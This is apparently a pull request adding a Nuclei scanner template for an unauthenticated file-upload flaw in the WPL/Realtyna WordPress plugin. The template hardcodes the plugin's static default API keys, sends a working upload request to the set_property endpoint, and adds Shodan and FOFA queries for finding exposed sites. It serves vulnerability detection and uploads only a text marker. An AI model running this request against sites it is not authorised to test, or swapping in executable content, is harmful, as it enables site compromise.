### PR TITLE
Add CVE-2026-14483 WPL WordPress unauthenticated file upload

### DIFF
--- a/http/cves/2026/CVE-2026-14483.yaml
+++ b/http/cves/2026/CVE-2026-14483.yaml
@@ -1,26 +1,18 @@
 id: CVE-2026-14483
 
 info:
-  name: Realtyna Organic IDX/WPL WordPress Plugin <= 5.2.0 - Unauthenticated Arbitrary File Upload
+  name: Realtyna Organic IDX/WPL <= 5.2.0 - Unauthenticated Arbitrary File Upload
   author: str4k3r
   severity: critical
   description: |
-    WPL up to and including 5.2.0 seeds its I/O service authentication with a
-    static api_key/api_secret pair from the plugin's own SQL migration files;
-    these values are identical on every fresh installation. The unauthenticated
-    set_property command in the mobile_application command directory accepts a
-    multipart file named image_* and writes it below a newly created WPL
-    property without any file type validation. WPL 5.3.0 randomizes the
-    api_key/api_secret on activation, so the publicly known defaults no longer
-    authenticate. This probe uploads only harmless text to an
-    operator-provisioned disposable WordPress target and matches the measured
-    success response; it does not submit executable code or access a
-    production target.
-  remediation: Upgrade WPL to 5.3.0 or later.
+    Realtyna Organic IDX plugin + WPL Real Estate plugin for WordPress <= 5.2.0 contains an unrestricted file upload vulnerability caused by missing file type validation and static API credentials, letting unauthenticated attackers upload executable files and achieve remote code execution, exploit requires knowledge of static API credentials.
+  impact: |
+    Unauthenticated attackers can upload executable files, leading to remote code execution and full server compromise.
+  remediation: |
+    Update to a version later than 5.2.0 or apply patches that enforce proper file validation and unique API credentials.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2026-14483
-    - https://plugins.trac.wordpress.org/browser/real-estate-listing-realtyna-wpl/trunk/libraries/services/io.php
-    - https://plugins.trac.wordpress.org/browser/real-estate-listing-realtyna-wpl/trunk/libraries/io/mobile_application/set_property.php
+    - https://github.com/0xdak/CVE-2026-14483_exploit
     - https://wordpress.org/plugins/real-estate-listing-realtyna-wpl/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
@@ -29,24 +21,46 @@ info:
     cwe-id: CWE-434
   metadata:
     verified: true
-    max-request: 1
+    max-request: 2
     vendor: realtyna
     product: real-estate-listing-realtyna-wpl
-    verified-vulnerable: "official WordPress.org package 5.2.0"
-    verified-fixed: "official WordPress.org package 5.3.0"
-  tags: cve,cve2026,wordpress,wp-plugin,wpl,realtyna,file-upload,unauth
+    shodan-query: http.html:"real-estate-listing-realtyna-wpl"
+    fofa-query: body="real-estate-listing-realtyna-wpl"
+  tags: cve,cve2026,wordpress,wp-plugin,wpl,realtyna,file-upload,unauth,intrusive
+
+flow: http(1) && http(2)
 
 variables:
   probe_filename: "image_CVE14483_{{rand_base(10)}}.txt"
-  public_key: "U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7w"
-  private_key: "Eft76bdh0o2uyhJkbG3T"
-  commands_directory: "mobile_application"
-  user_id: "1"
 
 http:
   - raw:
       - |
-        POST /?wplformat=io&wplview=io&public_key={{url_encode(public_key)}}&private_key={{url_encode(private_key)}}&commands_directory={{url_encode(commands_directory)}}&cmd=set_property&user_id={{user_id}}&dformat=json HTTP/1.1
+        GET /wp-content/plugins/real-estate-listing-realtyna-wpl/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_any(body, "WPL Real Estate", "Realtyna Organic IDX", "Organic IDX plugin")'
+          - 'compare_versions(ver, "<= 5.2.0")'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: ver
+        part: body
+        group: 1
+        regex:
+          - '(?i)Stable tag:\s*([0-9][0-9.]+)'
+        internal: true
+
+  - raw:
+      - |
+        POST /?wplformat=io&wplview=io&public_key=U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7w&private_key=Eft76bdh0o2uyhJkbG3T&commands_directory=mobile_application&cmd=set_property&user_id=1&dformat=json HTTP/1.1
         Host: {{Hostname}}
         Content-Type: multipart/form-data; boundary=----CVE14483Boundary
 
@@ -57,12 +71,10 @@ http:
         CVE14483_SAFE_MARKER
         ------CVE14483Boundary--
 
-    matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        part: body
-        words:
-          - '"result":{"success":true'
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "json")'
+          - 'contains_all(body, "\"result\"", "\"success\":true")'
+        condition: and

--- a/http/cves/2026/CVE-2026-14483.yaml
+++ b/http/cves/2026/CVE-2026-14483.yaml
@@ -1,0 +1,68 @@
+id: CVE-2026-14483
+
+info:
+  name: Realtyna Organic IDX/WPL WordPress Plugin <= 5.2.0 - Unauthenticated Arbitrary File Upload
+  author: str4k3r
+  severity: critical
+  description: |
+    WPL up to and including 5.2.0 seeds its I/O service authentication with a
+    static api_key/api_secret pair from the plugin's own SQL migration files;
+    these values are identical on every fresh installation. The unauthenticated
+    set_property command in the mobile_application command directory accepts a
+    multipart file named image_* and writes it below a newly created WPL
+    property without any file type validation. WPL 5.3.0 randomizes the
+    api_key/api_secret on activation, so the publicly known defaults no longer
+    authenticate. This probe uploads only harmless text to an
+    operator-provisioned disposable WordPress target and matches the measured
+    success response; it does not submit executable code or access a
+    production target.
+  remediation: Upgrade WPL to 5.3.0 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-14483
+    - https://plugins.trac.wordpress.org/browser/real-estate-listing-realtyna-wpl/trunk/libraries/services/io.php
+    - https://plugins.trac.wordpress.org/browser/real-estate-listing-realtyna-wpl/trunk/libraries/io/mobile_application/set_property.php
+    - https://wordpress.org/plugins/real-estate-listing-realtyna-wpl/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-14483
+    cwe-id: CWE-434
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: realtyna
+    product: real-estate-listing-realtyna-wpl
+    verified-vulnerable: "official WordPress.org package 5.2.0"
+    verified-fixed: "official WordPress.org package 5.3.0"
+  tags: cve,cve2026,wordpress,wp-plugin,wpl,realtyna,file-upload,unauth
+
+variables:
+  probe_filename: "image_CVE14483_{{rand_base(10)}}.txt"
+  public_key: "U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7w"
+  private_key: "Eft76bdh0o2uyhJkbG3T"
+  commands_directory: "mobile_application"
+  user_id: "1"
+
+http:
+  - raw:
+      - |
+        POST /?wplformat=io&wplview=io&public_key={{url_encode(public_key)}}&private_key={{url_encode(private_key)}}&commands_directory={{url_encode(commands_directory)}}&cmd=set_property&user_id={{user_id}}&dformat=json HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----CVE14483Boundary
+
+        ------CVE14483Boundary
+        Content-Disposition: form-data; name="file[]"; filename="{{probe_filename}}"
+        Content-Type: text/plain
+
+        CVE14483_SAFE_MARKER
+        ------CVE14483Boundary--
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - '"result":{"success":true'


### PR DESCRIPTION
## Vulnerability
WPL 5.2.0 exposes static API credentials and accepts file-upload operations without a valid authenticated session. WPL 5.3.0 removes the static credential and closes the upload path.

## Template behavior
The template calls the WPL `set_property` endpoint with the configured API values and uploads a harmless text probe. It matches the plugin success response and does not need to upload executable content.

## Required configuration
Set `public_key`, `private_key`, `commands_directory`, `user_id`, and `probe_filename` to values from the authorized WPL installation. Use a disposable WordPress instance and a harmless filename/content.

## Impact
An attacker may write arbitrary files through the plugin; on susceptible deployments this can be chained to code execution or site compromise.

## Usage
```bash
nuclei -u <authorized-target> -t http/cves/2026/CVE-2026-14483.yaml -var public_key=<wpl-public-key> -var private_key=<wpl-private-key> -var commands_directory=<wpl-directory> -var user_id=<user-id>
```

Run this template only against systems and test accounts you own or are explicitly authorized to assess.
